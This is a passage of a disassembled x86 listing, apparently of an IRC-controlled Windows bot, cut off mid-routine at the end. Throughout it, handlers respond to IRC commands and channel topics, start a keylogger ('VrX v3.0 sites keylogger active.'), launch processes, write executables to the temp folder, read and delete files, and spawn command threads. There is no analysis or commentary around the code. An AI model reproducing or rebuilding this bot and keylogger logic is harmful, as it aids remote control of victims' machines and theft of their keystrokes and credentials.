loc_408323: ; CODE XREF: sub_401ACD+684B�j
cmp [ebp+var_C], ebx
jz loc_406BFE
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_406BFE
lea eax, [ebp+var_E34]
push eax
lea eax, [ebp+var_668]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_427074 ; CreateProcessA
test eax, eax
jnz short loc_40836E
push offset unk_42A518
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_40836E: ; CODE XREF: sub_401ACD+6895�j
push edi
push offset dword_42A4FC
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_408379: ; CODE XREF: sub_401ACD+49A3�j
; sub_401ACD+49BA�j
push [ebp+arg_18] ; Str2
push offset aSbrti ; "sbrti"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4084F0
lea eax, [ebp+var_4BF8]
push eax
push 104h
call ds:dword_4270B8 ; GetTempPathA
push 0FFh ; Count
lea eax, [ebp+var_25D4]
push edi ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_17D4]
push eax
call sub_40AB77
add esp, 10h
push eax
lea eax, [ebp+var_4BF8]
push eax
lea eax, [ebp+var_24D4]
push offset aSS_exe ; "%s%s.exe"
push eax ; Dest
call _sprintf
mov eax, [ebp+esi+Str2]
add esp, 10h
cmp eax, ebx
mov [ebp+var_23D0], 1
mov [ebp+var_23CC], ebx
jz short loc_40840E
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_23C4], eax
jmp short loc_408414
; ---------------------------------------------------------------------------
loc_40840E: ; CODE XREF: sub_401ACD+692B�j
mov [ebp+var_23C4], ebx
loc_408414: ; CODE XREF: sub_401ACD+693F�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_40842B
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_23C8], eax
jmp short loc_408431
; ---------------------------------------------------------------------------
loc_40842B: ; CODE XREF: sub_401ACD+694D�j
mov [ebp+var_23C8], ebx
loc_408431: ; CODE XREF: sub_401ACD+695C�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_23C0], eax
lea eax, [ebp+var_2654]
mov [ebp+var_2658], esi
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_23B8], eax
mov eax, [ebp+var_8]
mov [ebp+var_23BC], eax
push edi
lea eax, [ebp+Dst]
push offset asc_42A4C4 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push 1Eh ; int
push eax ; Source
call sub_40B3BA
add esp, 18h
mov [ebp+var_23D4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2658]
push ebx
push eax
push offset sub_4167A0
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_23D4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4084DF
loc_4084C9: ; CODE XREF: sub_401ACD+6A10�j
cmp [ebp+var_23B4], ebx
jnz loc_406BFE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4084C9
; ---------------------------------------------------------------------------
loc_4084DF: ; CODE XREF: sub_401ACD+69FA�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42A488
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_4084F0: ; CODE XREF: sub_401ACD+68BD�j
push offset asc_42A440 ; "-"
loc_4084F5: ; CODE XREF: sub_401ACD+2E30�j
; sub_401ACD+447D�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_406BFE
; ---------------------------------------------------------------------------
loc_408508: ; CODE XREF: sub_401ACD+4975�j
; sub_401ACD+498C�j
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_401F75
cmp [ebp+var_C], ebx
jz loc_401F75
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
pop ecx
push eax
lea eax, [ebp+Dst]
push [ebp+Format]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
push edi ; Str
call _atoi
add esp, 28h
test eax, eax
jle short loc_408591
push edi ; Str
call _atoi
imul eax, 3E8h
pop ecx
push eax
call ds:dword_427080 ; Sleep
loc_408591: ; CODE XREF: sub_401ACD+6AAE�j
push offset dword_42A41C
call sub_415D38
mov eax, [ebp+File]
pop ecx
inc eax
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_4085A5: ; CODE XREF: sub_401ACD+4947�j
; sub_401ACD+495E�j
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_401F75
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat ; "repeat"
push eax ; Str1
call _strcmp
add esp, 10h
test eax, eax
push esi
jz short loc_408664
push [ebp+Format]
lea eax, [ebp+Dst]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
add esp, 24h
lea eax, [ebp+Dst]
push esi
push offset unk_42A404 ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415D38
push edi ; Str
call _atoi
add esp, 14h
test eax, eax
jle loc_409644
push edi ; Str
call _atoi
add eax, [ebp+File]
pop ecx
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_408664: ; CODE XREF: sub_401ACD+6B1D�j
lea eax, [ebp+Dst]
push offset unk_42A3D0 ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408678: ; CODE XREF: sub_401ACD+74E3�j
cmp [ebp+var_8], ebx
jnz short loc_408699
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_408699: ; CODE XREF: sub_401ACD+6BAE�j
; sub_401ACD+71C7�j ...
lea eax, [ebp+Dst]
push eax
call sub_415D38
jmp loc_409643
; ---------------------------------------------------------------------------
loc_4086AA: ; CODE XREF: sub_401ACD+4919�j
; sub_401ACD+4930�j
push 7Fh ; Count
lea eax, [ebp+var_2218]
push edi ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_2198]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_2118]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
add esp, 24h
mov [ebp+var_2094], eax
mov eax, [ebp+var_8]
mov [ebp+var_221C], esi
push [ebp+arg_18]
mov [ebp+var_2090], eax
lea eax, [ebp+Dst]
push edi
push offset asc_42A39C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Fh ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_2098], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_221C]
push ebx
push eax
push offset sub_414F57
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_2098]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40876E
loc_408758: ; CODE XREF: sub_401ACD+6C9F�j
cmp [ebp+var_208C], ebx
jnz loc_40885A
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_408758
; ---------------------------------------------------------------------------
loc_40876E: ; CODE XREF: sub_401ACD+6C89�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A360
jmp loc_40884B
; ---------------------------------------------------------------------------
loc_40877F: ; CODE XREF: sub_401ACD+48EB�j
; sub_401ACD+4902�j
push 7Fh ; Count
lea eax, [ebp+var_23AC]
push edi ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_232C]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_22AC]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
add esp, 24h
mov [ebp+var_2228], eax
mov eax, [ebp+var_8]
mov [ebp+var_23B0], esi
push [ebp+arg_18]
mov [ebp+var_2224], eax
lea eax, [ebp+Dst]
push edi
push offset asc_42A334 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 11h ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_222C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_23B0]
push ebx
push eax
push offset sub_414703
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_222C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40883F
loc_40882D: ; CODE XREF: sub_401ACD+6D70�j
cmp [ebp+var_2220], ebx
jnz short loc_40885A
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40882D
; ---------------------------------------------------------------------------
loc_40883F: ; CODE XREF: sub_401ACD+6D5E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset asc_42A2F8 ; "-"
loc_40884B: ; CODE XREF: sub_401ACD+6CAD�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40885A: ; CODE XREF: sub_401ACD+6C91�j
; sub_401ACD+6D66�j
cmp [ebp+var_8], ebx
jnz loc_403FBE
push ebx
lea eax, [ebp+Dst]
push [ebp+var_4]
push eax
push [ebp+Format]
push esi
jmp loc_403FB6
; ---------------------------------------------------------------------------
loc_40887A: ; CODE XREF: sub_401ACD+48BD�j
; sub_401ACD+48D4�j
push [ebp+arg_18]
lea eax, [ebp+Dst]
push offset aPartS_0 ; "PART %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 10h
loc_408897: ; CODE XREF: sub_401ACD+6E31�j
test eax, eax
jle loc_409644
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409644
loc_4088B1: ; CODE XREF: sub_401ACD+789B�j
lea eax, [ebp+Dst]
push eax ; Args
push offset aS ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E91C[eax] ; int
call sub_409823
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_4088DA: ; CODE XREF: sub_401ACD+488F�j
; sub_401ACD+48A6�j
push [ebp+esi+Str2]
lea eax, [ebp+Dst]
push [ebp+arg_18]
push offset aJoinSS_0 ; "JOIN %s %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 14h
jmp short loc_408897
; ---------------------------------------------------------------------------
loc_408900: ; CODE XREF: sub_401ACD+4861�j
; sub_401ACD+4878�j
push [ebp+arg_18]
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 10h
test eax, eax
jle loc_409644
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409644
lea eax, [ebp+Dst]
push eax ; Args
push offset aS ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E91C[eax] ; int
call sub_409823
add esp, 0Ch
push [ebp+arg_18]
push edi ; Args
push offset dword_42A2C0 ; Format
loc_408967: ; CODE XREF: sub_401ACD+6F24�j
; sub_401ACD+6F92�j ...
call sub_415DAC
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_408971: ; CODE XREF: sub_401ACD+4833�j
; sub_401ACD+484A�j
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4089A2
push esi
lea eax, [ebp+Dst]
push offset aModeS ; "MODE %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_4089A2: ; CODE XREF: sub_401ACD+6EBE�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409644
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409644
lea eax, [ebp+Dst]
push eax ; Args
push offset aS ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E91C[eax] ; int
call sub_409823
add esp, 0Ch
push esi
push edi
push offset dword_42A29C
jmp loc_408967
; ---------------------------------------------------------------------------
loc_4089F6: ; CODE XREF: sub_401ACD+4805�j
; sub_401ACD+481C�j
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409644
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409644
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409644
push esi ; Args
push offset aS ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E91C[eax] ; int
call sub_409823
add esp, 0Ch
push esi
push edi
push offset dword_42A280
jmp loc_408967
; ---------------------------------------------------------------------------
loc_408A64: ; CODE XREF: sub_401ACD+47D7�j
; sub_401ACD+47EE�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409644
push esi ; Args
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
add esp, 0Ch
push esi
push offset unk_42A258
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_408A9E: ; CODE XREF: sub_401ACD+47A9�j
; sub_401ACD+47C0�j
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_401F75
push [ebp+arg_18] ; Args
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
push edi ; Str
call _atoi
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_427080 ; Sleep
push [ebp+esi+Str2]
push [ebp+arg_18] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409823
push offset dword_42A238
call sub_415D38
jmp loc_4034BF
; ---------------------------------------------------------------------------
loc_408B04: ; CODE XREF: sub_401ACD+477B�j
; sub_401ACD+4792�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi ; Str
call _strlen
push [ebp+arg_8] ; Str
mov esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+arg_18] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409644
push esi
lea eax, [ebp+Dst]
push offset dword_42A968 ; Format
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push ebx ; int
push eax ; int
push edi ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 20h
push esi
push edi
push offset unk_42A21C
jmp loc_408967
; ---------------------------------------------------------------------------
loc_408B6D: ; CODE XREF: sub_401ACD+474D�j
; sub_401ACD+4764�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi ; Str
call _strlen
push [ebp+arg_8] ; Str
mov esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+arg_18] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409644
push ebx ; int
push ebx ; int
push esi ; int
push edi ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
push esi
push edi
push offset unk_42A200
jmp loc_408967
; ---------------------------------------------------------------------------
loc_408BBE: ; CODE XREF: sub_401ACD+471F�j
; sub_401ACD+4736�j
cmp [ebp+var_C], ebx
jz loc_401F75
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_401F75
push eax ; int
push edi ; Str2
call sub_415C40
pop ecx
pop ecx
push edi
push offset unk_42A1E4
jmp loc_40723F
; ---------------------------------------------------------------------------
loc_408BF0: ; CODE XREF: sub_401ACD+46F1�j
; sub_401ACD+4708�j
push [ebp+arg_18] ; int
push edi ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_418A2E
loc_408C05: ; CODE XREF: sub_401ACD+25EC�j
add esp, 14h
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_408C0D: ; CODE XREF: sub_401ACD+46B1�j
; sub_401ACD+46C8�j
push edi ; SubStr
push [ebp+arg_1C] ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_409644
mov esi, [ebp+esi+Format]
cmp esi, ebx
jz loc_408CB1
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408C99
push esi
lea eax, [ebp+Dst]
push [ebp+Format]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
add esp, 24h
lea eax, [ebp+Dst]
push esi
push edi
push offset unk_42A1C0 ; Format
push eax ; Dest
call _sprintf
add esp, 10h
inc [ebp+File]
jmp loc_408699
; ---------------------------------------------------------------------------
loc_408C99: ; CODE XREF: sub_401ACD+7171�j
lea eax, [ebp+Dst]
push offset unk_42A190 ; Format
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_408699
; ---------------------------------------------------------------------------
loc_408CB1: ; CODE XREF: sub_401ACD+715C�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41B243
add esp, 0Ch
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
lea eax, [ebp+Dst]
push edi
push offset unk_42A178 ; Format
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp loc_408699
; ---------------------------------------------------------------------------
loc_408CFB: ; CODE XREF: sub_401ACD+4434�j
; sub_401ACD+444B�j
push edi ; Str
push 23h ; int
push offset aKeylog_0 ; "Keylog"
push offset aVrxV3_0SitesKe ; "VrX v3.0 sites keylogger active."
loc_408D08: ; CODE XREF: sub_401ACD+103C�j
; sub_401ACD+108F�j ...
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push [ebp+arg_4] ; int
call sub_40B648
add esp, 20h
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_408D24: ; CODE XREF: sub_401ACD+4406�j
; sub_401ACD+441D�j
push 23h
call sub_40B602
test eax, eax
pop ecx
jle short loc_408D3A
push offset aKeylogerAlread ; "Keyloger Already running."
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_408D3A: ; CODE XREF: sub_401ACD+7261�j
mov eax, [ebp+arg_4]
push edi ; Str2
mov [ebp+var_A98], eax
mov eax, [ebp+var_4]
mov [ebp+var_A0C], eax
mov eax, [ebp+var_8]
push offset aWeb ; "web"
mov [ebp+var_A08], eax
mov [ebp+var_A10], ebx
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_408DB9
mov esi, [ebp+esi+Format]
mov [ebp+var_A10], 1
cmp esi, ebx
jnz short loc_408D9D
mov esi, offset aF_0 ; "#f"
push offset byte_43DB88 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_408D9D
mov esi, [ebp+Format]
loc_408D9D: ; CODE XREF: sub_401ACD+72B2�j
; sub_401ACD+72C8�j
push esi ; Format
lea eax, [ebp+var_A90]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
push offset aVrxV3_0SitesKe ; "VrX v3.0 sites keylogger active."
jmp short loc_408E0F
; ---------------------------------------------------------------------------
loc_408DB9: ; CODE XREF: sub_401ACD+729D�j
push edi ; Str2
push offset aNormal_0 ; "normal"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_408E97
mov esi, [ebp+esi+Format]
cmp esi, ebx
jnz short loc_408DF5
mov esi, offset aF_0 ; "#f"
push offset byte_43DB88 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_408DF5
mov esi, [ebp+Format]
loc_408DF5: ; CODE XREF: sub_401ACD+730A�j
; sub_401ACD+7320�j
push esi ; Format
lea eax, [ebp+var_A90]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
push offset aNormalKeyLogge ; "Normal key logger active."
loc_408E0F: ; CODE XREF: sub_401ACD+72EA�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+Dst]
pop ecx
push ebx ; int
push 23h ; int
push eax ; Source
call sub_40B3BA
add esp, 0Ch
mov [ebp+var_A94], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A98]
push ebx
push eax
push offset sub_4126A7
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_A94]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_408E7A
loc_408E64: ; CODE XREF: sub_401ACD+73AB�j
cmp [ebp+var_A04], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_408E64
; ---------------------------------------------------------------------------
loc_408E7A: ; CODE XREF: sub_401ACD+7395�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset aFailedToStartL ; "Failed to start logging thread, error: "...
loc_408E86: ; CODE XREF: sub_401ACD+20F8�j
; sub_401ACD+2E94�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
jmp loc_4081AA
; ---------------------------------------------------------------------------
loc_408E97: ; CODE XREF: sub_401ACD+72FB�j
push offset aUnknowModeType ; "Unknow mode type."
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_408EA1: ; CODE XREF: sub_401ACD+4065�j
; sub_401ACD+407C�j
push offset aR ; "r"
push edi ; Filename
call _fopen
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408F0D
mov ebx, 200h
push esi ; File
lea eax, [ebp+Dst]
push ebx ; MaxCount
push eax ; Buf
call _fgets
add esp, 0Ch
loc_408ECA: ; CODE XREF: sub_401ACD+742C�j
test eax, eax
jz short loc_408EFB
push 1 ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
push esi ; File
lea eax, [ebp+Dst]
push ebx ; MaxCount
push eax ; Buf
call _fgets
add esp, 20h
jmp short loc_408ECA
; ---------------------------------------------------------------------------
loc_408EFB: ; CODE XREF: sub_401ACD+73FF�j
push esi ; File
call _fclose
pop ecx
push edi
push offset unk_42A0A4
jmp loc_409091
; ---------------------------------------------------------------------------
loc_408F0D: ; CODE XREF: sub_401ACD+73E5�j
push edi
push offset unk_42A084
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_408F18: ; CODE XREF: sub_401ACD+4037�j
; sub_401ACD+404E�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409644
push offset asc_42A080 ; "\n"
push esi ; Dest
call _strcat
push esi ; Str
call sub_419F9D
add esp, 0Ch
test eax, eax
jnz short loc_408F55
push offset unk_42A054
jmp short loc_408FA2
; ---------------------------------------------------------------------------
loc_408F55: ; CODE XREF: sub_401ACD+747F�j
push esi
lea eax, [ebp+Dst]
push offset asc_42A03C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_408699
; ---------------------------------------------------------------------------
loc_408F6F: ; CODE XREF: sub_401ACD+4009�j
; sub_401ACD+4020�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_409644
push eax ; Format
call sub_41875E
test eax, eax
pop ecx
jnz short loc_408F9D
push offset unk_42A01C
jmp short loc_408FA2
; ---------------------------------------------------------------------------
loc_408F9D: ; CODE XREF: sub_401ACD+74C7�j
push offset asc_42A000 ; "-"
loc_408FA2: ; CODE XREF: sub_401ACD+7486�j
; sub_401ACD+74CE�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_408678
; ---------------------------------------------------------------------------
loc_408FB5: ; CODE XREF: sub_401ACD+3FDB�j
; sub_401ACD+3FF2�j
push 7Fh ; Count
lea eax, [ebp+var_2084]
push edi ; Source
push eax ; Dest
call _strncpy
mov esi, [ebp+esi+Format]
add esp, 0Ch
cmp esi, ebx
jz short loc_408FE4
push 7Fh ; Count
lea eax, [ebp+var_2004]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_408FE4: ; CODE XREF: sub_401ACD+7503�j
push 7Fh ; Count
lea eax, [ebp+var_1F84]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_2088], eax
mov eax, [ebp+var_8]
mov [ebp+var_1F00], eax
mov eax, [ebp+var_4]
mov [ebp+var_1EFC], eax
push edi
lea eax, [ebp+Dst]
push offset asc_429FE8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ch ; int
push eax ; Source
call sub_40B3BA
add esp, 18h
mov [ebp+var_1F04], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2088]
push ebx
push eax
push offset sub_41B302
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1F04]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_409085
loc_40906F: ; CODE XREF: sub_401ACD+75B6�j
cmp [ebp+var_1EF8], ebx
jnz loc_406C1F
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40906F
; ---------------------------------------------------------------------------
loc_409085: ; CODE XREF: sub_401ACD+75A0�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset asc_429FA8 ; "-"
loc_409091: ; CODE XREF: sub_401ACD+298B�j
; sub_401ACD+743B�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_406C1F
; ---------------------------------------------------------------------------
loc_4090A5: ; CODE XREF: sub_401ACD+3FAD�j
; sub_401ACD+3FC4�j
push ebx ; Source
push [ebp+Format] ; int
push [ebp+arg_4] ; int
push edi ; Str
call sub_41036B
add esp, 10h
push edi
push offset dword_429F90
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_4090C3: ; CODE XREF: sub_401ACD+3F7F�j
; sub_401ACD+3F96�j
push 14h ; Size
lea eax, [ebp+var_1D4C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_1D38]
push edi
push offset aS_6 ; "%s"
push eax ; Dest
call _sprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_1D54], eax
lea eax, [ebp+var_C4]
push eax ; Format
lea eax, [ebp+var_1C34]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1BAC], eax
mov eax, [ebp+var_8]
mov [ebp+var_1BA8], eax
lea eax, [ebp+var_1C34]
push eax
lea eax, [ebp+var_1D38]
push eax
lea eax, [ebp+Dst]
push offset asc_429F6C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ah ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_1BB0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1D54]
push ebx
push eax
push offset sub_4161C1
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1BB0]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz loc_4023CA
loc_40918A: ; CODE XREF: sub_401ACD+76D1�j
cmp [ebp+var_1BA4], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40918A
; ---------------------------------------------------------------------------
loc_4091A0: ; CODE XREF: sub_401ACD+3F51�j
; sub_401ACD+3F68�j
push edi
call ds:dword_427088 ; DeleteFileA
test eax, eax
jz short loc_4091C7
push edi
push offset asc_429F50 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
jmp loc_40929A
; ---------------------------------------------------------------------------
loc_4091C7: ; CODE XREF: sub_401ACD+76DC�j
push offset dword_42A5A8
call sub_418699
pop ecx
push eax
jmp loc_403EED
; ---------------------------------------------------------------------------
loc_4091D8: ; CODE XREF: sub_401ACD+3F23�j
; sub_401ACD+3F3A�j
push edi ; Str
call _atoi
push eax
call sub_419F16
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_4091F5
push offset unk_429F2C
jmp short loc_4091FA
; ---------------------------------------------------------------------------
loc_4091F5: ; CODE XREF: sub_401ACD+771F�j
